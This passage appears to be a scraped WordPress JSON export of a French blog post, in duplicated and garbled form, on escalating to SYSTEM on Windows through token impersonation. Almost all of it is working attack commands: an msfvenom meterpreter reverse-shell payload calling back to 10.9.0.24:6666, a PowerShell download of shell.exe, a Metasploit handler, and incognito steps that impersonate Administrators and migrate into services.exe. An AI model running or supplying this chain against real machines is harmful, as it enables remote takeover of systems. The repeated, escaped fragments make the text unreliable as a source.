Si on se rend compte que nous avons les privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter<\/p>\n
Nous cr\u00e9er le code initial pour avoir une session meterpreter T\u00e9l\u00e9chargement du code Pr\u00e9paration dans msfconsole Ex\u00e9cution du code Nous avons maintenant une session dans metasploit. Si on se rend compte que nous avons les privil\u00e8ges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter Nous cr\u00e9er le code initial pour avoir une session meterpreter msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 –encoder x86\/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe T\u00e9l\u00e9chargement du code sudo python -m http.server 80 powershell "(New-Object System.Net.WebClient).Downloadfile('http:\/\/10.9.0.24','shell.exe')" Pr\u00e9paration dans msfconsole use exploit\/multi\/handler set PAYLOAD windows\/meterpreter\/reverse_tcp set LHOST 10.9.0.24 set LPORT 6666 run Ex\u00e9cution du code shell.exe Nous avons maintenant une session dans metasploit. load incognito list_tokens -g impersonate_token "BUILTIN\\Administrators" getuid ps #pour trouver le pid du processus services.exe <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,69],"tags":[],"yoast_head":"\n
\nmsfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe<\/code><\/p>\n
\nsudo python -m http.server 80\npowershell "(New-Object System.Net.WebClient).Downloadfile('http:\/\/10.9.0.24','shell.exe')"<\/code><\/pre><\/p>\n
\nuse exploit\/multi\/handler\nset PAYLOAD windows\/meterpreter\/reverse_tcp \nset LHOST 10.9.0.24 \nset LPORT 6666 \nrun<\/code><\/pre><\/p>\n
\nshell.exe<\/code><\/p>\n
\nload incognito\nlist_tokens -g\nimpersonate_token "BUILTIN\\Administrators"\ngetuid\nps #pour trouver le pid du processus services.exe\nmigrate <em>services_pid<\/em>\nshell\nwhoami #devrait \u00eatre nt authority\\system<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"